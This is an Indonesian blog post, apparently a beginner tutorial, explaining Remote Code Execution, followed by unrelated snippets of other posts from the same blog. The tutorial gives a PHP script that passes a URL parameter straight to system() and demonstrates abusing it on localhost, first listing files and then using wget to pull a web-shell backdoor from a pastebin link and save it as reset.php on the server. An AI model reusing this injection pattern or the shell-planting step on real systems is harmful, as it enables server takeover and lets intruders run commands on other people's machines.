Skip to main content

Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.
Labels:

Comments

Post a Comment

Popular posts from this blog

[5.0.2] Iky Os Sm-G530h Fortunave3g

        Di postingan kali ini saya akan share [5.0.2] Iky OS sm-g530h fortunave3g, rom ini base stock rom lolipop sm-g530h instal via twrp, pribadi saja Note:fortunave3g Link rom: https://drive.google.com/open?id=1fbvi56Gi2Ezt2WbZscZJbEJnvKClA2Vj Link fix contacts: https://drive.google.com/open?id=1J7QLccyprHhHvpreVIXDVwJmu_PlRCHw Cara instal rom - lakukan 3 wipe, wipe data, dalvic, cache - Instal rom [5.0.2] Iky OS sm-g530h fortunave3g - Instak fix contacts - Tunggu sampai selesai - Reboot system Kelebihan - Root - Smooth - Full deodex - Tweak - Multi user - Like Grace ux - dan lainya Bug -----------   Feature Iky OS 5.0.2  Status kafetaria - Battery style - Battery bar   - Carrier label - Carrier logo - Network traffic - Gradient status bar - Mini calendar ( Show hidden ) - Digital clock ( Show hidden ) - Default clock ( Show hidden ) Qs panel - Header bann...
Post a Comment
Read more

Catatan: Fitur TabunganKu dan Pilihan Netizen

Penggemar tabungan tanpa biaya administrasi bulanan boleh berterima kasih pada presiden ke-enam Susilo Bambang Yudhoyono (SBY). Tanpa ide dan pencanangan Gerakan Indonesia Menabung  oleh beliau, boleh jadi produk ini tidak pernah ada. Kalau yang sekarang ……… ( Gak usah di lanjut deh…. No comment aja…. Dari pada kebablasan bisa repot…  cos, saya bisa nulis setajam silet, silet nya Feny Rose tapi
Post a Comment
Read more

mengamati kedatangan pengunjung dengan feedjit

Apakah kegunaan widget yang satu ini ( live traffic feedjit ) ..? jadi dengan widget ini anda bisa mengetahui darimana pengunjung blog anda datang, dari blog orang lain atau dari hasil pencarian pencarian search engine semacam google, yahoo, msn livesearch dan lain lain. Dengan widget ini pula anda juga dapat membantu menaikkan SEO blog anda dengan cara menelusuri dan membuka dari site serach referer ( website pencarian yang sudah menjadi media pengantar kedatangan pengunjung anda ) tapi akan saya bahas tutorial nya di lain session, karena tidak sesuai dengan topik judul yang dibahas sekarang, tapi jika anda merikuesnya pasti akan segera saya posting untuk anda.. dijamin dech.. hehehe.. Oke sekarang kita kembali ketopik pembahasan yaitu " mengamati kedatangan pengunjung blog dengan feedjit ". Apa itu feedjit ..? adalah sutu website penyedia widget counter yang berfungsi untuk merekam kedatangan pengunjung suatu blog atau web ( live traffic feed ). Nah untuk mendapatka...
Post a Comment
Read more